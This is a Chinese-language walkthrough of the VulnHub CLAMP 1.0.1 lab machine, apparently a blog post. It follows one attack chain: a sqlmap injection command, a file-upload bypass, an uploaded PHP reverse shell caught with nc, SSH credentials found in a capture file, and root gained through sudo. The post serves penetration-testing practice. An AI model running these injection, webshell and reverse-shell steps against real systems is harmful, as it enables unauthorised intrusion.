【vulnhub】CLAMP 1.0.1靶机

信息收集

靶机发现

端口扫描

页面访问,并查看源码

访问 /nt4stopc/,下面有一些问题,提示必须收集答案

一些判断题,对与错对应1与0,最后结果为0110111001,拼接访问

点击图中位置,发现存在参数,php语言,尝试注入

是存在注入的,使用 sqlmap 跑一下

复制代码
python3 sqlmap.py -u "http://192.168.93.162/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

gereksiz 下得到一串值:

hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php

解码后得到:

uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

可能是路径,拼接访问

复制代码
http://192.168.93.162/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

再拼接 upload.php

文件上传,以md5提交,但是没有提交按钮,自己在前端给加一个

<input type="submit">

获取shell

kali 生成反弹 shell

复制代码
locate php-reverse-shell.php
 
cp /usr/share/webshells/php/php-reverse-shell.php .
 
vim php-reverse-shell.php

上传该文件后,返回了文件路径,文件名为md5加密后的

nc监听,访问文件,成功反弹shell

提权

复制代码
python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下发现 important.pcapng,查看文件,发现内容

url解码,得到以下数据

复制代码
email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work
 
账号密码:
mkelepce:mklpc-osas112.

ssh连接,连接成功

查看权限

sudo su 提权成功

相关推荐
市场部需要一个软件开发岗位1 小时前
JAVA开发常见安全问题:Cookie 中明文存储用户名、密码
android·java·安全
lingggggaaaa1 小时前
安全工具篇&动态绕过&DumpLsass凭据&Certutil下载&变异替换&打乱源头特征
学习·安全·web安全·免杀对抗
凯子坚持 c1 小时前
CANN-LLM:基于昇腾 CANN 的高性能、全功能 LLM 推理引擎
人工智能·安全
QT.qtqtqtqtqt2 小时前
未授权访问漏洞
网络·安全·web安全
大方子3 小时前
【PolarCTF】rce1
网络安全·polarctf
ba_pi5 小时前
每天写点什么2026-02-04(2.1)信息安全
安全·web安全
枷锁—sha5 小时前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
菩提小狗5 小时前
小迪安全2023-2024|第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载_笔记|web安全|渗透测试|
笔记·安全·web安全
聚铭网络5 小时前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
Mintopia7 小时前
Web 安全与反编译源码下的权限设计:构筑前后端一致的防护体系
前端·安全